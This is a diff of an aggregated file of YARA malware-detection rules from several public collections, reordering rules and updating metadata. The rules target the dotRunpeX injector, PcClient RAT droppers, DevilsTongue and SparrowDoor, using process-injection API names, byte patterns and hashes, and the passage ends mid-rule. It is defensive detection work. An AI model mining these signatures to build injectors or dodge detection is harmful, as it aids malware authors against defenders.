- logic_hash = "e8d2672553c7f44e1cc177fad6596bd58b5c32a7541f91ce1207e6b21ef6e52d" + logic_hash = "7974e0de821ddcafd4f00b27d587108f0d80f8a231dd0db4d2be4fa6ab44fef4" score = 75 - quality = 83 + quality = 85 tags = "FILE" strings: - $s1 = {43 3a 5c 55 73 65 72 73 5c 6d 70 78 31 36 5c 73 6f 75 72 63 65 5c 72 65 70 6f 73} + $s1 = {32 14 3E E8 F6 81 00 00} + $s2 = {00 58 00 2D 00 43 00 6F 00 6E 00 66 00 69 00 67} + $s3 = {58 00 2D 00 49 00 6E 00 66 00 6F} condition: uint16(0)==0x5A4D and all of them } -rule RUSSIANPANDA_Obfuscation_Powershell_Special_Chars -{ - meta: - description = "Detects PowerShell special character obfuscation" - author = "RussianPanda" - id = "dd2d41d4-3431-5252-adf1-d537f3b8db7e" - date = "2024-01-12" - modified = "2024-02-02" - reference = "https://perl-users.jp/articles/advent-calendar/2010/sym/11" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/PowerShell Obfuscation/obfuscation_powershell_special_chars.yar#L1-L15" - license_url = "N/A" - hash = "d77efad78ef3afc5426432597ba129141952719846bc5ccd058249bb23d8a905" - logic_hash = "4cc4ebffe7bf712b412a060536acc51d94381d24b46e5494195ae17482076cd6" - score = 75 - quality = 81 - tags = "" - - strings: - $s1 = {7d 3d 2b 2b 24 7b} - $s2 = {24 28 20 20 29} - $s3 = {24 7B [1-10] 7D 20 20 2B 20 20 24} - $s4 = {24 7B [1-10] 7D 24 7B} - - condition: - 2 of ($s*) -} /* * YARA Rule Set * Repository Name: Check Point * Repository: https://github.com/mikesxrs/Open-Source-YARA-rules - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: ec0056f767db98bf6d5fd63877ad51fb54d350e9 * Number of Rules: 4 * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance) @@ -208158,71 +210075,6 @@ rule RUSSIANPANDA_Obfuscation_Powershell_Special_Chars * * NO LICENSE SET */ -rule CHECK_POINT_Injector_ZZ_Dotrunpex : FILE -{ - meta: - description = "Detects new version of dotRunpeX - configurable .NET injector" - author = "Jiri Vinopal (jiriv)" - id = "6cdbe54b-2e8d-5f7b-81ac-983236d1449f" - date = "2022-10-30" - modified = "2023-04-10" - reference = "https://research.checkpoint.com/2023/dotrunpex-demystifying-new-virtualized-net-injector-used-in-the-wild/" - source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Checkpoint/injector_ZZ_dotRunpeX.yar#L1-L58" - license_url = "N/A" - logic_hash = "ca4336533f90598a6b6f594036e20595073e0e7cab5fcd186995c5c7f2be287e" - score = 75 - quality = 83 - tags = "FILE" - hash1 = "373a86e36f7e808a1db263b4b49d2428df4a13686da7d77edba7a6dd63790232" - hash2 = "41ea8f9a9f2a7aeb086dedf8e5855b0409f31e7793cbba615ca0498e47a72636" - hash3 = "5e3588e8ddebd61c2bd6dab4b87f601bd6a4857b33eb281cb5059c29cfe62b80" - hash4 = "8c451b84d9579b625a7821ad7ddcb87bdd665a9e6619eaecf6ab93cd190cf504" - hash5 = "8fa81f6341b342afa40b7dc76dd6e0a1874583d12ea04acf839251cb5ca61591" - hash6 = "cd4c821e329ec1f7bfe7ecd39a6020867348b722e8c84a05c7eb32f8d5a2f4db" - hash7 = "fa8a67642514b69731c2ce6d9e980e2a9c9e409b3947f2c9909d81f6eac81452" - hash8 = "eb2e2ac0f5f51d90fe90b63c3c385af155b2fee30bc3dc6309776b90c21320f5" - - strings: - $implmap1 = "VirtualAllocEx" - $implmap2 = "CreateProcess" - $implmap3 = "CreateRemoteThread" - $implmap4 = "Wow64SetThreadContext" - $implmap5 = "Wow64GetThreadContext" - $implmap6 = "NtResumeThread" - $implmap7 = "ZwUnmapViewOfSection" - $implmap8 = "NtWriteVirtualMemory" - $implmap9 = "MessageBox" - $implmap10 = "Wow64DisableWow64FsRedirection" - $implmap11 = "Wow64RevertWow64FsRedirection" - $implmap12 = "CreateFile" - $implmap13 = "RtlInitUnicodeString" - $implmap14 = "NtLoadDriver" - $implmap15 = "NtUnloadDriver" - $implmap16 = "OpenProcessToken" - $implmap17 = "LookupPrivilegeValue" - $implmap18 = "AdjustTokenPrivileges" - $implmap19 = "CloseHandle" - $implmap20 = "NtQuerySystemInformation" - $implmap21 = "DeviceIoControl" - $implmap22 = "GetProcessHeap" - $implmap23 = "HeapFree" - $implmap24 = "HeapAlloc" - $implmap25 = "GetProcAddress" - $implmap26 = "CopyMemory" - $modulerefKernel1 = "Kernel32" - $modulerefKernel2 = "kernel32" - $modulerefNtdll1 = "Ntdll" - $modulerefNtdll2 = "ntdll" - $modulerefAdvapi1 = "Advapi32" - $modulerefAdvapi2 = "advapi32" - $regPath = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\TaskKill" wide - $rsrcName = "BIDEN_HARRIS_PERFECT_ASSHOLE" wide - $koiVM1 = "KoiVM" - $koiVM2 = "#Koi" - - condition: - uint16(0)==0x5a4d and uint16( uint32(0x3c))==0x4550 and ($regPath or $rsrcName or 1 of ($koiVM*)) and 24 of ($implmap*) and 1 of ($modulerefKernel*) and 1 of ($modulerefNtdll*) and 1 of ($modulerefAdvapi*) -} rule CHECK_POINT_Malware_Bumblebee_Packed { meta: @@ -208265,6 +210117,59 @@ rule CHECK_POINT_Malware_Bumblebee_Packed condition: $heapalloc } +rule CHECK_POINT_Injector_ZZ_Dotrunpex_Oldnew : FILE +{ + meta: + description = "Detects new and old version of dotRunpeX - configurable .NET injector" + author = "Jiri Vinopal (jiriv)" + id = "43e2d520-bfe4-5530-a5b4-508cfba9d06e" + date = "2022-10-30" + modified = "2023-04-10" + reference = "https://research.checkpoint.com/2023/dotrunpex-demystifying-new-virtualized-net-injector-used-in-the-wild/" + source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Checkpoint/injector_ZZ_dotRunpeX_oldnew.yar#L1-L45" + license_url = "N/A" + logic_hash = "c6ae0b4fb6cae16ae8d71e238f7753e0eadd23820507616fa2331375f4403052" + score = 75 + quality = 85 + tags = "FILE" + hash1_New = "373a86e36f7e808a1db263b4b49d2428df4a13686da7d77edba7a6dd63790232" + hash2_New = "41ea8f9a9f2a7aeb086dedf8e5855b0409f31e7793cbba615ca0498e47a72636" + hash3_New = "5e3588e8ddebd61c2bd6dab4b87f601bd6a4857b33eb281cb5059c29cfe62b80" + hash4_New = "8c451b84d9579b625a7821ad7ddcb87bdd665a9e6619eaecf6ab93cd190cf504" + hash5_New = "8fa81f6341b342afa40b7dc76dd6e0a1874583d12ea04acf839251cb5ca61591" + hash6_New = "cd4c821e329ec1f7bfe7ecd39a6020867348b722e8c84a05c7eb32f8d5a2f4db" + hash7_New = "fa8a67642514b69731c2ce6d9e980e2a9c9e409b3947f2c9909d81f6eac81452" + hash8_New = "eb2e2ac0f5f51d90fe90b63c3c385af155b2fee30bc3dc6309776b90c21320f5" + hash1_Old = "1e7614f757d40a2f5e2f4bd5597d04878768a9c01aa5f9f23d6c87660f7f0fbc" + hash2_Old = "317e6817bba0f54e1547dd9acf24ee17a4cda1b97328cc69dc1ec16e11c258fc" + hash3_Old = "65cac67ed2a084beff373d6aba6f914b8cba0caceda254a857def1df12f5154b" + hash4_Old = "68ae2ee5ed7e793c1a49cbf1b0dd7f5a3de9cb783b51b0953880994a79037326" + hash5_Old = "81763d8e3b42d07d76b0a74eda4e759981971635d62072c8da91251fc849b91e" + + strings: + $implmap1 = "VirtualAllocEx" + $implmap2 = "CreateProcess" + $implmap3 = "CreateRemoteThread" + $implmap4 = "Wow64SetThreadContext" + $implmap5 = "Wow64GetThreadContext" + $implmap6 = "RtlInitUnicodeString" + $implmap7 = "NtLoadDriver" + $implmap8 = "LoadLibrary" + $implmap9 = "VirtualProtect" + $implmap10 = "AdjustTokenPrivileges" + $implmap11 = "GetProcAddress" + $modulerefKernel1 = "Kernel32" + $modulerefKernel2 = "kernel32" + $modulerefNtdll1 = "Ntdll" + $modulerefNtdll2 = "ntdll" + $regPath = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\TaskKill" wide + $rsrcName = "BIDEN_HARRIS_PERFECT_ASSHOLE" wide + $koiVM1 = "KoiVM" + $koiVM2 = "#Koi" + + condition: + uint16(0)==0x5a4d and uint16( uint32(0x3c))==0x4550 and ($regPath or $rsrcName or 1 of ($koiVM*)) and 9 of ($implmap*) and 1 of ($modulerefKernel*) and 1 of ($modulerefNtdll*) +} rule CHECK_POINT_Apt_Nazar_Component_Guids { meta: @@ -208305,34 +210210,29 @@ rule CHECK_POINT_Apt_Nazar_Component_Guids condition: any of them } -rule CHECK_POINT_Injector_ZZ_Dotrunpex_Oldnew : FILE +rule CHECK_POINT_Injector_ZZ_Dotrunpex : FILE { meta: - description = "Detects new and old version of dotRunpeX - configurable .NET injector" + description = "Detects new version of dotRunpeX - configurable .NET injector" author = "Jiri Vinopal (jiriv)" - id = "43e2d520-bfe4-5530-a5b4-508cfba9d06e" + id = "6cdbe54b-2e8d-5f7b-81ac-983236d1449f" date = "2022-10-30" modified = "2023-04-10" reference = "https://research.checkpoint.com/2023/dotrunpex-demystifying-new-virtualized-net-injector-used-in-the-wild/" - source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Checkpoint/injector_ZZ_dotRunpeX_oldnew.yar#L1-L45" + source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Checkpoint/injector_ZZ_dotRunpeX.yar#L1-L58" license_url = "N/A" - logic_hash = "c6ae0b4fb6cae16ae8d71e238f7753e0eadd23820507616fa2331375f4403052" + logic_hash = "ca4336533f90598a6b6f594036e20595073e0e7cab5fcd186995c5c7f2be287e" score = 75 - quality = 85 + quality = 83 tags = "FILE" - hash1_New = "373a86e36f7e808a1db263b4b49d2428df4a13686da7d77edba7a6dd63790232" - hash2_New = "41ea8f9a9f2a7aeb086dedf8e5855b0409f31e7793cbba615ca0498e47a72636" - hash3_New = "5e3588e8ddebd61c2bd6dab4b87f601bd6a4857b33eb281cb5059c29cfe62b80" - hash4_New = "8c451b84d9579b625a7821ad7ddcb87bdd665a9e6619eaecf6ab93cd190cf504" - hash5_New = "8fa81f6341b342afa40b7dc76dd6e0a1874583d12ea04acf839251cb5ca61591" - hash6_New = "cd4c821e329ec1f7bfe7ecd39a6020867348b722e8c84a05c7eb32f8d5a2f4db" - hash7_New = "fa8a67642514b69731c2ce6d9e980e2a9c9e409b3947f2c9909d81f6eac81452" - hash8_New = "eb2e2ac0f5f51d90fe90b63c3c385af155b2fee30bc3dc6309776b90c21320f5" - hash1_Old = "1e7614f757d40a2f5e2f4bd5597d04878768a9c01aa5f9f23d6c87660f7f0fbc" - hash2_Old = "317e6817bba0f54e1547dd9acf24ee17a4cda1b97328cc69dc1ec16e11c258fc" - hash3_Old = "65cac67ed2a084beff373d6aba6f914b8cba0caceda254a857def1df12f5154b" - hash4_Old = "68ae2ee5ed7e793c1a49cbf1b0dd7f5a3de9cb783b51b0953880994a79037326" - hash5_Old = "81763d8e3b42d07d76b0a74eda4e759981971635d62072c8da91251fc849b91e" + hash1 = "373a86e36f7e808a1db263b4b49d2428df4a13686da7d77edba7a6dd63790232" + hash2 = "41ea8f9a9f2a7aeb086dedf8e5855b0409f31e7793cbba615ca0498e47a72636" + hash3 = "5e3588e8ddebd61c2bd6dab4b87f601bd6a4857b33eb281cb5059c29cfe62b80" + hash4 = "8c451b84d9579b625a7821ad7ddcb87bdd665a9e6619eaecf6ab93cd190cf504" + hash5 = "8fa81f6341b342afa40b7dc76dd6e0a1874583d12ea04acf839251cb5ca61591" + hash6 = "cd4c821e329ec1f7bfe7ecd39a6020867348b722e8c84a05c7eb32f8d5a2f4db" + hash7 = "fa8a67642514b69731c2ce6d9e980e2a9c9e409b3947f2c9909d81f6eac81452" + hash8 = "eb2e2ac0f5f51d90fe90b63c3c385af155b2fee30bc3dc6309776b90c21320f5" strings: $implmap1 = "VirtualAllocEx" @@ -208340,29 +210240,46 @@ rule CHECK_POINT_Injector_ZZ_Dotrunpex_Oldnew : FILE $implmap3 = "CreateRemoteThread" $implmap4 = "Wow64SetThreadContext" $implmap5 = "Wow64GetThreadContext" - $implmap6 = "RtlInitUnicodeString" - $implmap7 = "NtLoadDriver" - $implmap8 = "LoadLibrary" - $implmap9 = "VirtualProtect" - $implmap10 = "AdjustTokenPrivileges" - $implmap11 = "GetProcAddress" + $implmap6 = "NtResumeThread" + $implmap7 = "ZwUnmapViewOfSection" + $implmap8 = "NtWriteVirtualMemory" + $implmap9 = "MessageBox" + $implmap10 = "Wow64DisableWow64FsRedirection" + $implmap11 = "Wow64RevertWow64FsRedirection" + $implmap12 = "CreateFile" + $implmap13 = "RtlInitUnicodeString" + $implmap14 = "NtLoadDriver" + $implmap15 = "NtUnloadDriver" + $implmap16 = "OpenProcessToken" + $implmap17 = "LookupPrivilegeValue" + $implmap18 = "AdjustTokenPrivileges" + $implmap19 = "CloseHandle" + $implmap20 = "NtQuerySystemInformation" + $implmap21 = "DeviceIoControl" + $implmap22 = "GetProcessHeap" + $implmap23 = "HeapFree" + $implmap24 = "HeapAlloc" + $implmap25 = "GetProcAddress" + $implmap26 = "CopyMemory" $modulerefKernel1 = "Kernel32" $modulerefKernel2 = "kernel32" $modulerefNtdll1 = "Ntdll" $modulerefNtdll2 = "ntdll" + $modulerefAdvapi1 = "Advapi32" + $modulerefAdvapi2 = "advapi32" $regPath = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\TaskKill" wide $rsrcName = "BIDEN_HARRIS_PERFECT_ASSHOLE" wide $koiVM1 = "KoiVM" $koiVM2 = "#Koi" condition: - uint16(0)==0x5a4d and uint16( uint32(0x3c))==0x4550 and ($regPath or $rsrcName or 1 of ($koiVM*)) and 9 of ($implmap*) and 1 of ($modulerefKernel*) and 1 of ($modulerefNtdll*) + uint16(0)==0x5a4d and uint16( uint32(0x3c))==0x4550 and ($regPath or $rsrcName or 1 of ($koiVM*)) and 24 of ($implmap*) and 1 of ($modulerefKernel*) and 1 of ($modulerefNtdll*) and 1 of ($modulerefAdvapi*) } /* * YARA Rule Set * Repository Name: Dragon Threat Labs * Repository: https://github.com/mikesxrs/Open-Source-YARA-rules - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: ec0056f767db98bf6d5fd63877ad51fb54d350e9 * Number of Rules: 7 * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance) @@ -208372,51 +210289,29 @@ rule CHECK_POINT_Injector_ZZ_Dotrunpex_Oldnew : FILE * * NO LICENSE SET */ -rule DRAGON_THREAT_LABS_Apt_Win_Mocelpa -{ - meta: - description = "APT malware; Mocelpa, downloader." - author = "@int0x00" - id = "2cf2ba5e-86b1-5533-9e14-61113e5f574d" - date = "2023-04-10" - modified = "2023-04-10" - reference = "https://github.com/DragonThreatLabs/IntelReports/blob/master/DTL-06282015-01.pdf" - source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/apt_win_mocelpa.yar#L1-L11" - license_url = "N/A" - logic_hash = "0331c0f690ac7a8870b3f4012f2828ed23850340edcf0b6ff80bc408d9174977" - score = 75 - quality = 28 - tags = "" - - strings: - $mz = {4D 5A} - $ssl_hello = {16 03 01 00 6B 01 00 00 67 03 01 54 B4 C9 7B 4F CF BC 5A 01 EC 4A 73 C8 6D BB C0 86 9F 7B A9 08 6A 60 37 05 81 97 1A C8 9F 45 E5 00 00 18 00 2F 00 35 00 05 00 0A C0 13 C0 14 C0 09 C0 0A 00 32 00 38 00 13 00 04 01 00 00 26 00 00 00 12 00 10 00 00 0D 77 77 77 2E 61 70 70 6C 65 2E 63 6F 6D 00 0A 00 06 00 04 00 17 00 18 00 0B 00 02 01 00} - - condition: - ($mz at 0) and ($ssl_hello) -} -rule DRAGON_THREAT_LABS_Apt_C16_Win64_Dropper : DROPPER FILE +rule DRAGON_THREAT_LABS_Apt_C16_Win_Swisyn : MEMORY FILE { meta: - description = "APT malware used to drop PcClient RAT" + description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check." author = "@dragonthreatlab" - id = "dbd1a16c-52a5-5b07-b34f-7eb7b78c1eab" + id = "af369075-aca3-576d-a10b-849703ffb4f1" date = "2015-01-11" modified = "2016-09-27" reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html" - source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/apt_c16_win64_dropper.yar#L1-L18" + source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/apt_c16_win_swisyn.yar#L1-L17" license_url = "N/A" - logic_hash = "df905711eca68c698ad6340e88ae99fdcae918c86ec2b7c26b62eead54fef892" + hash = "a6a18c846e5179259eba9de238f67e41" + logic_hash = "2fa29d3b17aa37501131132640953645d0089c9bc5ec13ffed7a498ad89c1558" score = 75 quality = 28 - tags = "DROPPER, FILE" + tags = "MEMORY, FILE" strings: - $mz = { 4D 5A } - $str1 = "clbcaiq.dll" ascii - $str2 = "profapi_104" ascii - $str3 = "\\Microsoft\\wuauclt\\wuauclt.dat" ascii - $str4 = { 0F B6 0A 48 FF C2 80 E9 03 80 F1 03 49 FF C8 88 4A FF 75 EC } + $mz = {4D 5A} + $str1 = "/ShowWU" ascii + $str2 = "IsWow64Process" + $str3 = "regsvr32 " + $str4 = {8A 11 2A 55 FC 8B 45 08 88 10 8B 4D 08 8A 11 32 55 FC 8B 45 08 88 10} condition: $mz at 0 and all of ($str*) @@ -208473,29 +210368,53 @@ rule DRAGON_THREAT_LABS_Apt_C16_Win_Wateringhole condition: any of ($str*) } -rule DRAGON_THREAT_LABS_Apt_C16_Win_Swisyn : MEMORY FILE +rule DRAGON_THREAT_LABS_Apt_Win_Mocelpa { meta: - description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check." + description = "APT malware; Mocelpa, downloader." + author = "@int0x00" + id = "2cf2ba5e-86b1-5533-9e14-61113e5f574d" + date = "2023-04-10" + modified = "2023-04-10" + reference = "https://github.com/DragonThreatLabs/IntelReports/blob/master/DTL-06282015-01.pdf" + source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/apt_win_mocelpa.yar#L1-L11" + license_url = "N/A" + logic_hash = "0331c0f690ac7a8870b3f4012f2828ed23850340edcf0b6ff80bc408d9174977" + score = 75 + quality = 28 + tags = "" + + strings: + $mz = {4D 5A} + $ssl_hello = {16 03 01 00 6B 01 00 00 67 03 01 54 B4 C9 7B 4F CF BC 5A 01 EC 4A 73 C8 6D BB C0 86 9F 7B A9 08 6A 60 37 05 81 97 1A C8 9F 45 E5 00 00 18 00 2F 00 35 00 05 00 0A C0 13 C0 14 C0 09 C0 0A 00 32 00 38 00 13 00 04 01 00 00 26 00 00 00 12 00 10 00 00 0D 77 77 77 2E 61 70 70 6C 65 2E 63 6F 6D 00 0A 00 06 00 04 00 17 00 18 00 0B 00 02 01 00} + + condition: + ($mz at 0) and ($ssl_hello) +} +rule DRAGON_THREAT_LABS_Apt_C16_Win32_Dropper : DROPPER FILE +{ + meta: + description = "APT malware used to drop PcClient RAT" author = "@dragonthreatlab" - id = "af369075-aca3-576d-a10b-849703ffb4f1" + id = "a1546f02-f01b-50ba-b4d9-9676e52dc4c1" date = "2015-01-11" modified = "2016-09-27" reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html" - source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/apt_c16_win_swisyn.yar#L1-L17" + source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/apt_c16_win32_dropper.yar#L1-L18" license_url = "N/A" - hash = "a6a18c846e5179259eba9de238f67e41" - logic_hash = "2fa29d3b17aa37501131132640953645d0089c9bc5ec13ffed7a498ad89c1558" + hash = "ad17eff26994df824be36db246c8fb6a" + logic_hash = "bb29bcf5e62cb1a55d7f0cb87b53bace26b99f858513dc4e544d531f70f54281" score = 75 quality = 28 - tags = "MEMORY, FILE" + tags = "DROPPER, FILE" strings: $mz = {4D 5A} - $str1 = "/ShowWU" ascii - $str2 = "IsWow64Process" - $str3 = "regsvr32 " - $str4 = {8A 11 2A 55 FC 8B 45 08 88 10 8B 4D 08 8A 11 32 55 FC 8B 45 08 88 10} + $str1 = "clbcaiq.dll" ascii + $str2 = "profapi_104" ascii + $str3 = "/ShowWU" ascii + $str4 = "Software\\Microsoft\\Windows\\CurrentVersion\\" ascii + $str5 = {8A 08 2A CA 32 CA 88 08 40 4E 75 F4 5E} condition: $mz at 0 and all of ($str*) @@ -208527,30 +210446,28 @@ rule DRAGON_THREAT_LABS_Apt_C16_Win_Disk_Pcclient : DISK } import "pe" -rule DRAGON_THREAT_LABS_Apt_C16_Win32_Dropper : DROPPER FILE +rule DRAGON_THREAT_LABS_Apt_C16_Win64_Dropper : DROPPER FILE { meta: description = "APT malware used to drop PcClient RAT" author = "@dragonthreatlab" - id = "a1546f02-f01b-50ba-b4d9-9676e52dc4c1" + id = "dbd1a16c-52a5-5b07-b34f-7eb7b78c1eab" date = "2015-01-11" modified = "2016-09-27" reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html" - source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L35-L52" + source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L87-L104" license_url = "N/A" - hash = "ad17eff26994df824be36db246c8fb6a" - logic_hash = "bb29bcf5e62cb1a55d7f0cb87b53bace26b99f858513dc4e544d531f70f54281" + logic_hash = "df905711eca68c698ad6340e88ae99fdcae918c86ec2b7c26b62eead54fef892" score = 75 quality = 28 tags = "DROPPER, FILE" strings: - $mz = {4D 5A} + $mz = { 4D 5A } $str1 = "clbcaiq.dll" ascii $str2 = "profapi_104" ascii - $str3 = "/ShowWU" ascii - $str4 = "Software\\Microsoft\\Windows\\CurrentVersion\\" ascii - $str5 = {8A 08 2A CA 32 CA 88 08 40 4E 75 F4 5E} + $str3 = "\\Microsoft\\wuauclt\\wuauclt.dat" ascii + $str4 = { 0F B6 0A 48 FF C2 80 E9 03 80 F1 03 49 FF C8 88 4A FF 75 EC } condition: $mz at 0 and all of ($str*) @@ -208559,7 +210476,7 @@ rule DRAGON_THREAT_LABS_Apt_C16_Win32_Dropper : DROPPER FILE * YARA Rule Set * Repository Name: Microsoft * Repository: https://github.com/mikesxrs/Open-Source-YARA-rules - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: ec0056f767db98bf6d5fd63877ad51fb54d350e9 * Number of Rules: 21 * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance) @@ -208569,38 +210486,6 @@ rule DRAGON_THREAT_LABS_Apt_C16_Win32_Dropper : DROPPER FILE * * NO LICENSE SET */ -import "pe" - -rule MICROSOFT_Devilstongue_Hijackdll : FILE -{ - meta: - description = "Detects SOURGUM's DevilsTongue hijack DLL" - author = "Microsoft Threat Intelligence Center (MSTIC)" - id = "b5de2a8c-e0c8-5c8c-bb65-aee5701b4bb3" - date = "2021-07-15" - modified = "2022-07-07" - reference = "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/" - source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Microsoft/DevilsTongue_HijackDll.yar#L2-L45" - license_url = "N/A" - logic_hash = "d1c01df74a00672bb8229d5433314d7cfa49ab22565e6cf78a4b6b2884dbd299" - score = 75 - quality = 80 - tags = "FILE" - - strings: - $str1 = "windows.old\\windows" wide - $str2 = "NtQueryInformationThread" - $str3 = "dbgHelp.dll" wide - $str4 = "StackWalk64" - $str5 = "ConvertSidToStringSidW" - $str6 = "S-1-5-18" wide - $str7 = "SMNew.dll" - $code1 = {B8 FF 15 00 00 66 39 41 FA 74 06 80 79 FB E8} - $code2 = {44 8B C0 B8 B5 81 4E 1B 41 F7 E8 C1 FA 05 8B CA C1 E9 1F 03 D1 69 CA 2C 01 00 00 44 2B C1 45 85 C0 7E 19} - - condition: - filesize <800KB and uint16(0)==0x5A4D and (pe.characteristics&pe.DLL) and (4 of them or ($code1 and $code2) or (pe.imphash()=="9a964e810949704ff7b4a393d9adda60")) -} rule MICROSOFT_Trojan_Win32_Plasrv : PLATINUM { meta: @@ -209159,11 +211044,43 @@ rule MICROSOFT_Trojan_Win32_Plakpeer : PLATINUM condition: $str1 and $str2 and $str3 and $str4 } +import "pe" + +rule MICROSOFT_Devilstongue_Hijackdll : FILE +{ + meta: + description = "Detects SOURGUM's DevilsTongue hijack DLL" + author = "Microsoft Threat Intelligence Center (MSTIC)" + id = "b5de2a8c-e0c8-5c8c-bb65-aee5701b4bb3" + date = "2021-07-15" + modified = "2022-07-07" + reference = "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/" + source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Microsoft/DevilsTongue_HijackDll.yar#L2-L45" + license_url = "N/A" + logic_hash = "d1c01df74a00672bb8229d5433314d7cfa49ab22565e6cf78a4b6b2884dbd299" + score = 75 + quality = 80 + tags = "FILE" + + strings: + $str1 = "windows.old\\windows" wide + $str2 = "NtQueryInformationThread" + $str3 = "dbgHelp.dll" wide + $str4 = "StackWalk64" + $str5 = "ConvertSidToStringSidW" + $str6 = "S-1-5-18" wide + $str7 = "SMNew.dll" + $code1 = {B8 FF 15 00 00 66 39 41 FA 74 06 80 79 FB E8} + $code2 = {44 8B C0 B8 B5 81 4E 1B 41 F7 E8 C1 FA 05 8B CA C1 E9 1F 03 D1 69 CA 2C 01 00 00 44 2B C1 45 85 C0 7E 19} + + condition: + filesize <800KB and uint16(0)==0x5A4D and (pe.characteristics&pe.DLL) and (4 of them or ($code1 and $code2) or (pe.imphash()=="9a964e810949704ff7b4a393d9adda60")) +} /* * YARA Rule Set * Repository Name: NCSC * Repository: https://github.com/mikesxrs/Open-Source-YARA-rules - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: ec0056f767db98bf6d5fd63877ad51fb54d350e9 * Number of Rules: 17 * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance) @@ -209224,6 +211141,31 @@ rule NCSC_Sparrowdoor_Sleep_Routine condition: all of them } +rule NCSC_Sparrowdoor_Loader : FILE +{ + meta: + description = "Targets code features of the SparrowDoor loader. This rule detects the previous variant and this new variant." + author = "NCSC" + id = "7107cb82-c4c9-503f-b006-baec6b667498" + date = "2022-02-28" + modified = "2022-07-06" + reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf" + source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_loader.yar#L1-L15" + license_url = "N/A" + logic_hash = "fa1bd386114d912722a5101a0112355dec654e2e9446c885c12946c7fae1c8f4" + score = 75 + quality = 80 + tags = "FILE" + hash1 = "989b3798841d06e286eb083132242749c80fdd4d" + + strings: + $xor_algo = {8B D0 83 E2 03 8A 54 14 10 30 14 30 40 3B C1} + $rva = {8D B0 [4] 8D 44 24 ?? 50 6A 40 6A 05 56} + $lj = {2B CE 83 E9 05 8D [3] 52 C6 06 E9 89 4E 01 8B [3] 50 6A 05 56} + + condition: + ( uint16(0)==0x5A4D) and uint32( uint32(0x3C))==0x00004550 and all of them +} rule NCSC_Neuron_Common_Strings : FILE { meta: @@ -209473,51 +211415,6 @@ rule NCSC_Neuron2_Dotnet_Strings : FILE condition: ( uint16(0)==0x5A4D and uint16( uint32(0x3c))==0x4550) and $dotnetMagic and 2 of ($s*) } -rule NCSC_Sparrowdoor_Config : FILE -{ - meta: - description = "Targets the XOR encoded loader config and shellcode in the file libhost.dll using the known position of the XOR key." - author = "NCSC" - id = "16eec5b6-c77a-585d-88f3-2c86abdbf2bd" - date = "2022-02-28" - modified = "2022-07-06" - reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf" - source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_config.yar#L1-L14" - license_url = "N/A" - logic_hash = "bd52496b6e7cabc875a277ce7d49f6b891c3f61591edef295dbee43716c15509" - score = 75 - quality = 80 - tags = "FILE" - hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f" - - condition: - ( uint16(0)!=0x5A4D) and ( uint16(0)!=0x8b55) and ( uint32(0)^ uint32(0x4c)==0x00) and ( uint32(0)^ uint32(0x34)==0x00) and ( uint16(0)^ 